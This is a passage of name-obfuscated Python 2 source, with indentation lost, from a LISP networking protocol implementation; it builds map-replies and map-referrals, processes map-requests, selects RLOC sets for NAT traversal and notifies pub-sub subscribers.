oO00OoO0O0O . rloc_probe = o0O0oO0OOOOO0
oO00OoO0O0O . echo_nonce_capable = enc
oO00OoO0O0O . hop_count = 0 if ( mr_ttl == - 1 ) else mr_ttl
oO00OoO0O0O . record_count = 1
oO00OoO0O0O . nonce = nonce
IiiiIi1iiii11 = oO00OoO0O0O . encode ( )
oO00OoO0O0O . print_map_reply ( )
if 45 - 45: Ii1I / OoOoOO00 + Oo0Ooo + Oo0Ooo * IiII
i111iII = lisp_eid_record ( )
i111iII . rloc_count = len ( rloc_set )
if ( iiO0O0oOO0O0 != None ) : i111iII . rloc_count += 1
i111iII . authoritative = auth
i111iII . record_ttl = ttl
i111iII . action = action
i111iII . eid = eid
i111iII . group = group
if 2 - 2: II111iiii
IiiiIi1iiii11 += i111iII . encode ( )
i111iII . print_record ( " " , False )
if 34 - 34: o0oOOo0O0Ooo * OOooOOo / OoO0O00
OoOoO0OOoOo0 = lisp_get_all_addresses ( ) + lisp_get_all_translated_rlocs ( )
if 94 - 94: II111iiii + i11iIiiIii % Ii1I / ooOoO0o * OoOoOO00
oooOII11i = None
for i1III111 in rloc_set :
o0oO0O00 = i1III111 . rloc . is_multicast_address ( )
I1Ii11iI = lisp_rloc_record ( )
oOOoiII = o0O0oO0OOOOO0 and ( o0oO0O00 or iiO0O0oOO0O0 == None )
oo0o00OO = i1III111 . rloc . print_address_no_iid ( )
if ( oo0o00OO in OoOoO0OOoOo0 or o0oO0O00 ) :
I1Ii11iI . local_bit = True
I1Ii11iI . probe_bit = oOOoiII
I1Ii11iI . keys = keys
if ( i1III111 . priority == 254 and lisp_i_am_rtr ) :
I1Ii11iI . rloc_name = "RTR"
if 59 - 59: IiII - Ii1I
if ( oooOII11i == None ) : oooOII11i = i1III111 . rloc
if 62 - 62: OOooOOo * o0oOOo0O0Ooo + IiII * o0oOOo0O0Ooo * i11iIiiIii - O0
I1Ii11iI . store_rloc_entry ( i1III111 )
I1Ii11iI . reach_bit = True
I1Ii11iI . print_record ( " " )
IiiiIi1iiii11 += I1Ii11iI . encode ( )
if 37 - 37: I1ii11iIi11i - Oo0Ooo . i11iIiiIii / i11iIiiIii + oO0o
if 19 - 19: i1IIi / i1IIi - OoooooooOO - OOooOOo . i1IIi
if 57 - 57: OOooOOo / I1ii11iIi11i * oO0o
if 53 - 53: o0oOOo0O0Ooo * Ii1I
if 42 - 42: I11i + iII111i / iIii1I11I1II1
if ( iiO0O0oOO0O0 != None ) :
I1Ii11iI = lisp_rloc_record ( )
if ( oooOII11i ) : I1Ii11iI . rloc . copy_address ( oooOII11i )
I1Ii11iI . local_bit = True
I1Ii11iI . probe_bit = True
I1Ii11iI . reach_bit = True
iii1Iii1 = lisp_encode_telemetry ( iiO0O0oOO0O0 , eo = str ( time . time ( ) ) )
I1Ii11iI . json = lisp_json ( "telemetry" , iii1Iii1 )
I1Ii11iI . print_record ( " " )
IiiiIi1iiii11 += I1Ii11iI . encode ( )
if 42 - 42: OoOoOO00 . I1ii11iIi11i
return ( IiiiIi1iiii11 )
if 77 - 77: I1ii11iIi11i % i1IIi + OOooOOo - OOooOOo - o0oOOo0O0Ooo
if 45 - 45: I1ii11iIi11i / o0oOOo0O0Ooo / I1IiiI - Oo0Ooo * ooOoO0o - I1ii11iIi11i
if 71 - 71: I1IiiI % OoO0O00
if 32 - 32: oO0o
if 2 - 2: Oo0Ooo
if 80 - 80: I1Ii111 * II111iiii % Oo0Ooo * ooOoO0o + o0oOOo0O0Ooo
if 96 - 96: ooOoO0o
def lisp_build_map_referral ( eid , group , ddt_entry , action , ttl , nonce ) :
iiII1IiIi1i = lisp_map_referral ( )
iiII1IiIi1i . record_count = 1
iiII1IiIi1i . nonce = nonce
IiiiIi1iiii11 = iiII1IiIi1i . encode ( )
iiII1IiIi1i . print_map_referral ( )
if 21 - 21: II111iiii - OOooOOo * O0
i111iII = lisp_eid_record ( )
if 52 - 52: IiII / I1IiiI - o0oOOo0O0Ooo
iI11i = 0
if ( ddt_entry == None ) :
i111iII . eid = eid
i111iII . group = group
else :
iI11i = len ( ddt_entry . delegation_set )
i111iII . eid = ddt_entry . eid
i111iII . group = ddt_entry . group
ddt_entry . map_referrals_sent += 1
if 78 - 78: OOooOOo - Oo0Ooo % o0oOOo0O0Ooo % I1ii11iIi11i
i111iII . rloc_count = iI11i
i111iII . authoritative = True
if 1 - 1: iII111i + Oo0Ooo . OOooOOo % II111iiii / i1IIi - OoO0O00
if 23 - 23: iIii1I11I1II1 + Oo0Ooo * IiII
if 80 - 80: OoooooooOO . ooOoO0o
if 52 - 52: O0 + O0 + I1IiiI
if 64 - 64: ooOoO0o
O0II = False
if ( action == LISP_DDT_ACTION_NULL ) :
if ( iI11i == 0 ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
else :
I1IooOoo00 = ddt_entry . delegation_set [ 0 ]
if ( I1IooOoo00 . is_ddt_child ( ) ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
if 35 - 35: I1IiiI . iIii1I11I1II1 + IiII / i11iIiiIii - II111iiii . OoooooooOO
if ( I1IooOoo00 . is_ms_child ( ) ) :
action = LISP_DDT_ACTION_MS_REFERRAL
if 19 - 19: IiII - OoOoOO00
if 43 - 43: IiII / OOooOOo % II111iiii . o0oOOo0O0Ooo / i11iIiiIii
if 5 - 5: oO0o % iII111i . Oo0Ooo . O0 . OoOoOO00 / iII111i
if 78 - 78: Ii1I - I1ii11iIi11i + iIii1I11I1II1 + OoooooooOO . OoO0O00 - ooOoO0o
if 81 - 81: o0oOOo0O0Ooo * OoooooooOO
if 32 - 32: OoOoOO00 - I11i * i11iIiiIii . I1ii11iIi11i . IiII . iIii1I11I1II1
if 41 - 41: iII111i / OoOoOO00 / OoO0O00 / ooOoO0o
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : O0II = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
O0II = ( lisp_i_am_ms and I1IooOoo00 . is_ms_peer ( ) == False )
if 16 - 16: iIii1I11I1II1 . II111iiii
if 80 - 80: Oo0Ooo + IiII
i111iII . action = action
i111iII . ddt_incomplete = O0II
i111iII . record_ttl = ttl
if 18 - 18: OoO0O00 . Oo0Ooo
IiiiIi1iiii11 += i111iII . encode ( )
i111iII . print_record ( " " , True )
if 52 - 52: OoOoOO00 . iIii1I11I1II1 / OoOoOO00
if ( iI11i == 0 ) : return ( IiiiIi1iiii11 )
if 14 - 14: i1IIi
for I1IooOoo00 in ddt_entry . delegation_set :
I1Ii11iI = lisp_rloc_record ( )
I1Ii11iI . rloc = I1IooOoo00 . delegate_address
I1Ii11iI . priority = I1IooOoo00 . priority
I1Ii11iI . weight = I1IooOoo00 . weight
I1Ii11iI . mpriority = 255
I1Ii11iI . mweight = 0
I1Ii11iI . reach_bit = True
IiiiIi1iiii11 += I1Ii11iI . encode ( )
I1Ii11iI . print_record ( " " )
if 63 - 63: OoOoOO00 . i11iIiiIii / IiII
return ( IiiiIi1iiii11 )
if 36 - 36: OOooOOo * OoOoOO00 + i11iIiiIii + O0 + O0
if 18 - 18: Oo0Ooo . I1ii11iIi11i * ooOoO0o % Ii1I + I1ii11iIi11i
if 23 - 23: oO0o / o0oOOo0O0Ooo + I11i % IiII * OoO0O00
if 48 - 48: OoO0O00
if 30 - 30: iIii1I11I1II1
if 53 - 53: II111iiii
if 40 - 40: Ii1I % oO0o
def lisp_etr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl , etr_in_ts ) :
if 69 - 69: iIii1I11I1II1 - O0 . I1Ii111 % I1IiiI / o0oOOo0O0Ooo
if ( map_request . target_group . is_null ( ) ) :
ooOOo0ooo = lisp_db_for_lookups . lookup_cache ( map_request . target_eid , False )
else :
ooOOo0ooo = lisp_db_for_lookups . lookup_cache ( map_request . target_group , False )
if ( ooOOo0ooo ) : ooOOo0ooo = ooOOo0ooo . lookup_source_cache ( map_request . target_eid , False )
if 71 - 71: OoOoOO00 / i11iIiiIii * iII111i
I11i11i1 = map_request . print_prefix ( )
if 90 - 90: Ii1I
if ( ooOOo0ooo == None ) :
lprint ( "Database-mapping entry not found for requested EID {}" . format ( green ( I11i11i1 , False ) ) )
if 27 - 27: oO0o + Ii1I . i11iIiiIii
return
if 97 - 97: iII111i . I1IiiI
if 71 - 71: OOooOOo - IiII % oO0o * I1ii11iIi11i
iIIiIIiII111 = ooOOo0ooo . print_eid_tuple ( )
if 24 - 24: O0 . Oo0Ooo + O0 % Ii1I + OoooooooOO
lprint ( "Found database-mapping EID-prefix {} for requested EID {}" . format ( green ( iIIiIIiII111 , False ) , green ( I11i11i1 , False ) ) )
if 72 - 72: I1ii11iIi11i
if 100 - 100: i11iIiiIii - iII111i - I11i
if 5 - 5: oO0o % IiII * iII111i
if 98 - 98: iII111i / OOooOOo + IiII
if 100 - 100: II111iiii . i11iIiiIii / oO0o - OOooOOo + OoOoOO00 % I1ii11iIi11i
o00O00oOO00 = map_request . itr_rlocs [ 0 ]
if ( o00O00oOO00 . is_private_address ( ) and lisp_nat_traversal ) :
o00O00oOO00 = source
if 3 - 3: i1IIi * I1ii11iIi11i * II111iiii . I1ii11iIi11i
if 82 - 82: OoOoOO00
Iii11I = map_request . nonce
i11 = lisp_nonce_echoing
iIi11III = map_request . keys
if 53 - 53: OOooOOo * OoOoOO00 % iII111i
if 86 - 86: OOooOOo . OOooOOo + IiII - I1ii11iIi11i . OoO0O00
if 66 - 66: I1IiiI * OoOoOO00 . I1IiiI / Oo0Ooo - Ii1I
if 69 - 69: iIii1I11I1II1 % iII111i + ooOoO0o * i1IIi + iII111i * I1Ii111
if 67 - 67: Ii1I % Oo0Ooo - Oo0Ooo . I11i + IiII
oOooo0o = map_request . json_telemetry
if ( oOooo0o != None ) :
map_request . json_telemetry = lisp_encode_telemetry ( oOooo0o , ei = etr_in_ts )
if 45 - 45: oO0o + ooOoO0o + OOooOOo * OOooOOo * o0oOOo0O0Ooo / Oo0Ooo
if 61 - 61: OoooooooOO % i11iIiiIii . i1IIi . OOooOOo
ooOOo0ooo . map_replies_sent += 1
if 90 - 90: iIii1I11I1II1 - iIii1I11I1II1 % O0
IiiiIi1iiii11 = lisp_build_map_reply ( ooOOo0ooo . eid , ooOOo0ooo . group , ooOOo0ooo . rloc_set , Iii11I ,
LISP_NO_ACTION , 1440 , map_request , iIi11III , i11 , True , ttl )
if 43 - 43: Oo0Ooo / i1IIi % Ii1I . OoOoOO00
if 22 - 22: iIii1I11I1II1 + Ii1I
if 73 - 73: I1IiiI / OoO0O00 / OoooooooOO
if 14 - 14: ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i . IiII + I1ii11iIi11i
if 30 - 30: I1ii11iIi11i + iIii1I11I1II1 . I1ii11iIi11i
if 9 - 9: I1IiiI - Ii1I * II111iiii - I11i
if 85 - 85: oO0o % ooOoO0o / OOooOOo
if 50 - 50: O0 * O0 / iIii1I11I1II1
if 31 - 31: I1IiiI / o0oOOo0O0Ooo
if 70 - 70: I1IiiI
if 36 - 36: ooOoO0o . oO0o . I11i - I1ii11iIi11i / OoOoOO00 * Oo0Ooo
if 42 - 42: OoooooooOO / o0oOOo0O0Ooo . Ii1I * iII111i * I1IiiI - Oo0Ooo
if 76 - 76: oO0o * II111iiii
if 81 - 81: I11i
if 2 - 2: OoOoOO00
if 75 - 75: I1IiiI - OoooooooOO * I1Ii111
if ( map_request . rloc_probe and len ( lisp_sockets ) == 4 ) :
iiI1Iii = ( o00O00oOO00 . is_private_address ( ) == False )
I11ii1I111Ii = o00O00oOO00 . print_address_no_iid ( )
if ( ( iiI1Iii and lisp_rtr_list . has_key ( I11ii1I111Ii ) ) or sport == 0 ) :
lisp_encapsulate_rloc_probe ( lisp_sockets , o00O00oOO00 , None , IiiiIi1iiii11 )
return
if 1 - 1: o0oOOo0O0Ooo % oO0o * I1Ii111 - i1IIi - iII111i . oO0o
if 25 - 25: i1IIi * o0oOOo0O0Ooo / oO0o
if 11 - 11: IiII + II111iiii
if 37 - 37: O0
if 98 - 98: IiII * OoooooooOO . iII111i
if 34 - 34: OoooooooOO + I1Ii111
lisp_send_map_reply ( lisp_sockets , IiiiIi1iiii11 , o00O00oOO00 , sport )
return
if 97 - 97: II111iiii + I11i + OOooOOo / i11iIiiIii - iII111i
if 9 - 9: i1IIi - I1Ii111 + I1Ii111
if 81 - 81: II111iiii % I11i % O0 . I1Ii111 % ooOoO0o - O0
if 58 - 58: OoooooooOO . II111iiii . O0 % I1Ii111 / OoooooooOO
if 64 - 64: Oo0Ooo + oO0o . OoO0O00
if 67 - 67: I11i
if 91 - 91: OOooOOo / OoO0O00
def lisp_rtr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl , etr_in_ts ) :
if 36 - 36: I1IiiI . iII111i * I1Ii111 . IiII % I1ii11iIi11i
if 44 - 44: I11i % I1ii11iIi11i - OoooooooOO % iII111i
if 60 - 60: IiII % oO0o
if 11 - 11: I1Ii111 - II111iiii
o00O00oOO00 = map_request . itr_rlocs [ 0 ]
if ( o00O00oOO00 . is_private_address ( ) ) : o00O00oOO00 = source
Iii11I = map_request . nonce
if 12 - 12: i11iIiiIii
ooOOoo0 = map_request . target_eid
IIi1iiIII11 = map_request . target_group
if 9 - 9: OOooOOo * I1ii11iIi11i + iIii1I11I1II1 / OoO0O00 * OoooooooOO
OoO0oOOooOO = [ ]
for oooOO0 in [ lisp_myrlocs [ 0 ] , lisp_myrlocs [ 1 ] ] :
if ( oooOO0 == None ) : continue
I1IIiIIIii = lisp_rloc ( )
I1IIiIIIii . rloc . copy_address ( oooOO0 )
I1IIiIIIii . priority = 254
OoO0oOOooOO . append ( I1IIiIIIii )
if 60 - 60: IiII + I1IiiI
if 61 - 61: OoO0O00
i11 = lisp_nonce_echoing
iIi11III = map_request . keys
if 96 - 96: ooOoO0o - OoooooooOO * iIii1I11I1II1 . IiII - O0
if 7 - 7: iIii1I11I1II1 . OoO0O00
if 88 - 88: i1IIi * II111iiii / i11iIiiIii % IiII . IiII
if 93 - 93: OoOoOO00 * i1IIi . Ii1I
if 2 - 2: i1IIi
oOooo0o = map_request . json_telemetry
if ( oOooo0o != None ) :
map_request . json_telemetry = lisp_encode_telemetry ( oOooo0o , ei = etr_in_ts )
if 84 - 84: i1IIi / Ii1I + OoOoOO00 % Ii1I . oO0o
if 74 - 74: OOooOOo - o0oOOo0O0Ooo - I1Ii111 - OoO0O00
IiiiIi1iiii11 = lisp_build_map_reply ( ooOOoo0 , IIi1iiIII11 , OoO0oOOooOO , Iii11I , LISP_NO_ACTION ,
1440 , map_request , iIi11III , i11 , True , ttl )
lisp_send_map_reply ( lisp_sockets , IiiiIi1iiii11 , o00O00oOO00 , sport )
return
if 40 - 40: o0oOOo0O0Ooo . IiII * OoOoOO00
if 14 - 14: OOooOOo
if 18 - 18: i11iIiiIii % iII111i
if 70 - 70: O0 + iII111i % I11i % I1Ii111 + OoOoOO00 / ooOoO0o
if 35 - 35: IiII + OoO0O00
if 82 - 82: i1IIi - ooOoO0o / I11i + I11i % I1IiiI - OoooooooOO
if 56 - 56: I1ii11iIi11i
if 80 - 80: Oo0Ooo / OOooOOo / iII111i . o0oOOo0O0Ooo
if 43 - 43: IiII
if 74 - 74: OoooooooOO
def lisp_get_private_rloc_set ( target_site_eid , seid , group ) :
OoO0oOOooOO = target_site_eid . registered_rlocs
if 88 - 88: Ii1I * o0oOOo0O0Ooo / oO0o
oO = lisp_site_eid_lookup ( seid , group , False )
if ( oO == None ) : return ( OoO0oOOooOO )
if 58 - 58: OoooooooOO . i1IIi
if 71 - 71: iII111i + ooOoO0o * OoOoOO00 . I1ii11iIi11i . I1Ii111
if 91 - 91: oO0o - Oo0Ooo % OoOoOO00 % o0oOOo0O0Ooo
if 71 - 71: i1IIi % iII111i * I1Ii111
II1ii1IIi1i = None
iioo00oOOO00 = [ ]
for i1III111 in OoO0oOOooOO :
if ( i1III111 . is_rtr ( ) ) : continue
if ( i1III111 . rloc . is_private_address ( ) ) :
oOO0Oo = copy . deepcopy ( i1III111 )
iioo00oOOO00 . append ( oOO0Oo )
continue
if 7 - 7: I1Ii111 * iIii1I11I1II1
II1ii1IIi1i = i1III111
break
if 27 - 27: iII111i % OoOoOO00 % ooOoO0o
if ( II1ii1IIi1i == None ) : return ( OoO0oOOooOO )
II1ii1IIi1i = II1ii1IIi1i . rloc . print_address_no_iid ( )
if 4 - 4: iII111i * oO0o / iIii1I11I1II1 - O0 . Ii1I
if 53 - 53: Ii1I % IiII + I11i % IiII
if 33 - 33: iII111i
if 8 - 8: I11i
oO0oo0o0ooO = None
for i1III111 in oO . registered_rlocs :
if ( i1III111 . is_rtr ( ) ) : continue
if ( i1III111 . rloc . is_private_address ( ) ) : continue
oO0oo0o0ooO = i1III111
break
if 41 - 41: OoO0O00 . Ii1I % II111iiii - i11iIiiIii % o0oOOo0O0Ooo % o0oOOo0O0Ooo
if ( oO0oo0o0ooO == None ) : return ( OoO0oOOooOO )
oO0oo0o0ooO = oO0oo0o0ooO . rloc . print_address_no_iid ( )
if 2 - 2: ooOoO0o / OOooOOo % iIii1I11I1II1 * I1IiiI - I11i
if 3 - 3: i11iIiiIii
if 52 - 52: oO0o . OoO0O00 + OoooooooOO % II111iiii % OoOoOO00 - I1Ii111
if 2 - 2: II111iiii * OOooOOo - I11i / I1IiiI
O0O0oOO = target_site_eid . site_id
if ( O0O0oOO == 0 ) :
if ( oO0oo0o0ooO == II1ii1IIi1i ) :
lprint ( "Return private RLOCs for sites behind {}" . format ( II1ii1IIi1i ) )
if 13 - 13: Oo0Ooo
return ( iioo00oOOO00 )
if 88 - 88: Oo0Ooo / oO0o . iIii1I11I1II1 . I1IiiI + I11i
return ( OoO0oOOooOO )
if 58 - 58: I11i
if 76 - 76: iIii1I11I1II1 % ooOoO0o / IiII + iIii1I11I1II1 % Oo0Ooo . Ii1I
if 72 - 72: Ii1I - I1ii11iIi11i * I1Ii111 % OoOoOO00 % OoOoOO00
if 44 - 44: o0oOOo0O0Ooo . O0 + Ii1I
if 61 - 61: ooOoO0o
if 23 - 23: OoooooooOO - OoOoOO00 / i11iIiiIii
if 37 - 37: I11i / o0oOOo0O0Ooo + oO0o % Ii1I
if ( O0O0oOO == oO . site_id ) :
lprint ( "Return private RLOCs for sites in site-id {}" . format ( O0O0oOO ) )
return ( iioo00oOOO00 )
if 83 - 83: I1ii11iIi11i . OOooOOo
return ( OoO0oOOooOO )
if 50 - 50: Ii1I - i11iIiiIii % Ii1I - OoOoOO00 + I1IiiI / OoooooooOO
if 57 - 57: I1IiiI - I11i - I1Ii111 . oO0o % Ii1I
if 59 - 59: I1IiiI % OoO0O00 . o0oOOo0O0Ooo
if 85 - 85: ooOoO0o . ooOoO0o % Oo0Ooo . OOooOOo + OOooOOo / I1IiiI
if 69 - 69: i1IIi + II111iiii / Ii1I
if 4 - 4: I11i * OoOoOO00 % o0oOOo0O0Ooo % ooOoO0o - I1ii11iIi11i
if 88 - 88: iIii1I11I1II1 * iIii1I11I1II1 * I11i * OoOoOO00
if 14 - 14: i11iIiiIii * I1IiiI % O0 % iIii1I11I1II1
if 18 - 18: Oo0Ooo % OOooOOo + IiII
def lisp_get_partial_rloc_set ( registered_rloc_set , mr_source , multicast ) :
I1 = [ ]
OoO0oOOooOO = [ ]
if 32 - 32: o0oOOo0O0Ooo + II111iiii / ooOoO0o
if 13 - 13: ooOoO0o % O0
if 26 - 26: iIii1I11I1II1 + iIii1I11I1II1 . Ii1I + i1IIi
if 16 - 16: II111iiii . Ii1I / i11iIiiIii
if 25 - 25: OoO0O00 + o0oOOo0O0Ooo
if 100 - 100: II111iiii - OOooOOo % oO0o % Ii1I . ooOoO0o / iII111i
I1Ii1iIiIi = False
oO0 = False
for i1III111 in registered_rloc_set :
if ( i1III111 . priority != 254 ) : continue
oO0 |= True
if ( i1III111 . rloc . is_exact_match ( mr_source ) == False ) : continue
I1Ii1iIiIi = True
break
if 25 - 25: I1Ii111 % OOooOOo
if 82 - 82: Ii1I
if 17 - 17: iII111i . i1IIi . i1IIi
if 76 - 76: OoooooooOO % IiII
if 81 - 81: iII111i . OOooOOo * i1IIi
if 14 - 14: oO0o
if 16 - 16: iII111i
if ( oO0 == False ) : return ( registered_rloc_set )
if 26 - 26: iII111i . oO0o * i11iIiiIii . iIii1I11I1II1
if 74 - 74: Ii1I / iIii1I11I1II1 + OOooOOo . II111iiii
if 65 - 65: OOooOOo * I11i * Oo0Ooo
if 21 - 21: Ii1I . iIii1I11I1II1
if 84 - 84: OOooOOo
if 67 - 67: I1IiiI % OoO0O00 % o0oOOo0O0Ooo % IiII
if 33 - 33: ooOoO0o % I1IiiI
if 98 - 98: oO0o . o0oOOo0O0Ooo + II111iiii
if 62 - 62: ooOoO0o - OoooooooOO / I1ii11iIi11i / iII111i - o0oOOo0O0Ooo
if 70 - 70: oO0o % OoooooooOO * I1IiiI - OoOoOO00 * OoOoOO00 . OOooOOo
I11I111Ii1II = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 29 - 29: II111iiii - i11iIiiIii - iII111i + i11iIiiIii . IiII - I1Ii111
if 40 - 40: I11i . iII111i + OoOoOO00 % I1ii11iIi11i
if 79 - 79: I1Ii111 - OOooOOo * I1ii11iIi11i + i11iIiiIii . iII111i
if 3 - 3: Oo0Ooo
if 81 - 81: OoO0O00 / OoO0O00 . I1ii11iIi11i
for i1III111 in registered_rloc_set :
if ( I11I111Ii1II and i1III111 . rloc . is_private_address ( ) ) : continue
if ( multicast == False and i1III111 . priority == 255 ) : continue
if ( multicast and i1III111 . mpriority == 255 ) : continue
if ( i1III111 . priority == 254 ) :
I1 . append ( i1III111 )
else :
OoO0oOOooOO . append ( i1III111 )
if 100 - 100: iIii1I11I1II1 % II111iiii - I1ii11iIi11i . iIii1I11I1II1 + IiII % iIii1I11I1II1
if 48 - 48: Ii1I % i1IIi
if 38 - 38: OOooOOo / I1ii11iIi11i % oO0o / o0oOOo0O0Ooo
if 54 - 54: OoOoOO00 * OoooooooOO - OoO0O00 * OoOoOO00 % I1ii11iIi11i * I11i
if 34 - 34: I11i - oO0o + I11i * OoooooooOO * I11i
if 73 - 73: OOooOOo * iII111i * OoO0O00
if ( I1Ii1iIiIi ) : return ( OoO0oOOooOO )
if 11 - 11: I1Ii111 * II111iiii
if 3 - 3: Oo0Ooo * OOooOOo
if 13 - 13: I1Ii111 + i11iIiiIii / OOooOOo
if 98 - 98: I1IiiI * Oo0Ooo
if 9 - 9: O0 / i11iIiiIii . iIii1I11I1II1 . IiII
if 14 - 14: OoOoOO00 . OOooOOo - Oo0Ooo + I1Ii111 % ooOoO0o
if 95 - 95: OoO0O00 * II111iiii + i1IIi
if 22 - 22: Ii1I / ooOoO0o % I11i + OoO0O00 . ooOoO0o
if 61 - 61: O0 - iIii1I11I1II1 * Oo0Ooo . Ii1I + O0
if 20 - 20: ooOoO0o / ooOoO0o - Ii1I - ooOoO0o
OoO0oOOooOO = [ ]
for i1III111 in registered_rloc_set :
if ( i1III111 . rloc . is_private_address ( ) ) : OoO0oOOooOO . append ( i1III111 )
if 93 - 93: O0 * OoOoOO00 * iIii1I11I1II1
OoO0oOOooOO += I1
return ( OoO0oOOooOO )
if 3 - 3: I1ii11iIi11i - O0
if 46 - 46: iII111i
if 99 - 99: oO0o
if 85 - 85: I1Ii111 * iIii1I11I1II1 . OoOoOO00
if 20 - 20: I11i * O0 - OoooooooOO * OOooOOo % oO0o * iII111i
if 70 - 70: I11i + O0 . i11iIiiIii . OOooOOo
if 48 - 48: iIii1I11I1II1 * Ii1I - OoooooooOO / oO0o - OoO0O00 / i11iIiiIii
if 24 - 24: I1IiiI
if 63 - 63: I11i - iIii1I11I1II1 * Ii1I + OoooooooOO . i11iIiiIii
if 94 - 94: OoO0O00 . oO0o . OoOoOO00 * i11iIiiIii
def lisp_store_pubsub_state ( reply_eid , itr_rloc , mr_sport , nonce , ttl , xtr_id ) :
Ooo = lisp_pubsub ( itr_rloc , mr_sport , nonce , ttl , xtr_id )
Ooo . add ( reply_eid )
return
if 45 - 45: oO0o + Ii1I - OOooOOo / I1IiiI
if 100 - 100: O0 - II111iiii + OoO0O00 % I1Ii111
if 40 - 40: iIii1I11I1II1 % OoO0O00 / o0oOOo0O0Ooo + iIii1I11I1II1
if 77 - 77: I1IiiI
if 97 - 97: Ii1I - I1IiiI
if 5 - 5: OoO0O00 / IiII . OoooooooOO / IiII / I1Ii111 * iIii1I11I1II1
if 79 - 79: IiII % ooOoO0o + IiII + IiII - o0oOOo0O0Ooo + iII111i
if 94 - 94: o0oOOo0O0Ooo * oO0o + O0 * iII111i + oO0o + ooOoO0o
if 29 - 29: OoO0O00
if 24 - 24: IiII - OoOoOO00 / OoooooooOO . I1ii11iIi11i
if 88 - 88: I11i
if 36 - 36: iIii1I11I1II1 - ooOoO0o * OoO0O00 * OoO0O00 . II111iiii
if 49 - 49: O0 + OoO0O00 - I1ii11iIi11i + ooOoO0o
if 90 - 90: O0 . Ii1I * OOooOOo * OoooooooOO * ooOoO0o * Ii1I
if 12 - 12: ooOoO0o * OoooooooOO * i1IIi
def lisp_convert_reply_to_notify ( packet ) :
if 3 - 3: o0oOOo0O0Ooo + Ii1I - i1IIi . OoooooooOO % Ii1I
if 39 - 39: o0oOOo0O0Ooo
if 73 - 73: IiII
if 92 - 92: OOooOOo / ooOoO0o . I1Ii111 . iII111i / ooOoO0o
ooOO0o0O0 = struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ]
ooOO0o0O0 = socket . ntohl ( ooOO0o0O0 ) & 0xff
Iii11I = packet [ 4 : 12 ]
packet = packet [ 12 : : ]
if 87 - 87: i11iIiiIii % i11iIiiIii + OoOoOO00 . O0 * II111iiii
if 24 - 24: O0 . I1ii11iIi11i / OOooOOo % IiII * Oo0Ooo / OoO0O00
if 67 - 67: Oo0Ooo * I11i - IiII + I1Ii111
if 90 - 90: iII111i % II111iiii % o0oOOo0O0Ooo + o0oOOo0O0Ooo + II111iiii
iII = ( LISP_MAP_NOTIFY << 28 ) | ooOO0o0O0
O0ooOoO0 = struct . pack ( "I" , socket . htonl ( iII ) )
o00O0o00oo = struct . pack ( "I" , 0 )
if 54 - 54: OoooooooOO . IiII - oO0o
if 26 - 26: o0oOOo0O0Ooo - i1IIi / I1ii11iIi11i / OoooooooOO . i1IIi
if 22 - 22: o0oOOo0O0Ooo * I1Ii111 * I1ii11iIi11i . OoOoOO00 . i1IIi % ooOoO0o
if 67 - 67: I11i
packet = O0ooOoO0 + Iii11I + o00O0o00oo + packet
return ( packet )
if 95 - 95: OoO0O00 % I1Ii111
if 49 - 49: II111iiii % OoOoOO00 % OOooOOo
if 40 - 40: I1ii11iIi11i + i1IIi
if 9 - 9: OOooOOo
if 74 - 74: OoOoOO00 - OOooOOo % OoOoOO00
if 82 - 82: I11i % IiII + Oo0Ooo + iIii1I11I1II1 - I11i - I1IiiI
if 65 - 65: IiII / O0 * II111iiii + oO0o
if 52 - 52: o0oOOo0O0Ooo - OoOoOO00 * II111iiii / OoooooooOO
def lisp_notify_subscribers ( lisp_sockets , eid_record , eid , site ) :
I11i11i1 = eid . print_prefix ( )
if ( lisp_pubsub_cache . has_key ( I11i11i1 ) == False ) : return
if 44 - 44: OOooOOo - oO0o + o0oOOo0O0Ooo - i1IIi % o0oOOo0O0Ooo
for Ooo in lisp_pubsub_cache [ I11i11i1 ] . values ( ) :
I11iiII1I1111 = Ooo . itr
Oo0O00O = Ooo . port
I111iI1IIIi1I = red ( I11iiII1I1111 . print_address_no_iid ( ) , False )
o0iiii1iii111i1 = bold ( "subscriber" , False )
I1II = "0x" + lisp_hex_string ( Ooo . xtr_id )
Iii11I = "0x" + lisp_hex_string ( Ooo . nonce )
if 90 - 90: iIii1I11I1II1
lprint ( " Notify {} {}:{} xtr-id {} for {}, nonce {}" . format ( o0iiii1iii111i1 , I111iI1IIIi1I , Oo0O00O , I1II , green ( I11i11i1 , False ) , Iii11I ) )
if 87 - 87: Oo0Ooo . o0oOOo0O0Ooo
if 33 - 33: iIii1I11I1II1 / OoooooooOO / I1IiiI + II111iiii
lisp_build_map_notify ( lisp_sockets , eid_record , [ I11i11i1 ] , 1 , I11iiII1I1111 ,
Oo0O00O , Ooo . nonce , 0 , 0 , 0 , site , False )
Ooo . map_notify_count += 1
if 42 - 42: OoOoOO00 / i1IIi * O0
return
if 46 - 46: OOooOOo - I1Ii111 + I1IiiI - ooOoO0o
if 96 - 96: IiII + i1IIi - I11i * I11i - OoO0O00 % II111iiii
if 47 - 47: I1Ii111 . i11iIiiIii + oO0o . I1ii11iIi11i
if 12 - 12: iIii1I11I1II1 % I1Ii111 * OoOoOO00 / OoooooooOO % OoooooooOO
if 81 - 81: iIii1I11I1II1 - Oo0Ooo - ooOoO0o . OoO0O00 + I1ii11iIi11i
if 84 - 84: iII111i . OOooOOo . iII111i * oO0o % Ii1I . oO0o
if 86 - 86: iII111i * ooOoO0o / iIii1I11I1II1 + Ii1I . iII111i
def lisp_process_pubsub ( lisp_sockets , packet , reply_eid , itr_rloc , port , nonce ,
ttl , xtr_id ) :
if 64 - 64: IiII - Oo0Ooo % iII111i % I11i
if 42 - 42: Oo0Ooo . OoO0O00
if 22 - 22: ooOoO0o - o0oOOo0O0Ooo + I11i / I1IiiI + OOooOOo
if 10 - 10: oO0o / I1IiiI
lisp_store_pubsub_state ( reply_eid , itr_rloc , port , nonce , ttl , xtr_id )
if 95 - 95: II111iiii - IiII % IiII . o0oOOo0O0Ooo
ooOOoo0 = green ( reply_eid . print_prefix ( ) , False )
I11iiII1I1111 = red ( itr_rloc . print_address_no_iid ( ) , False )
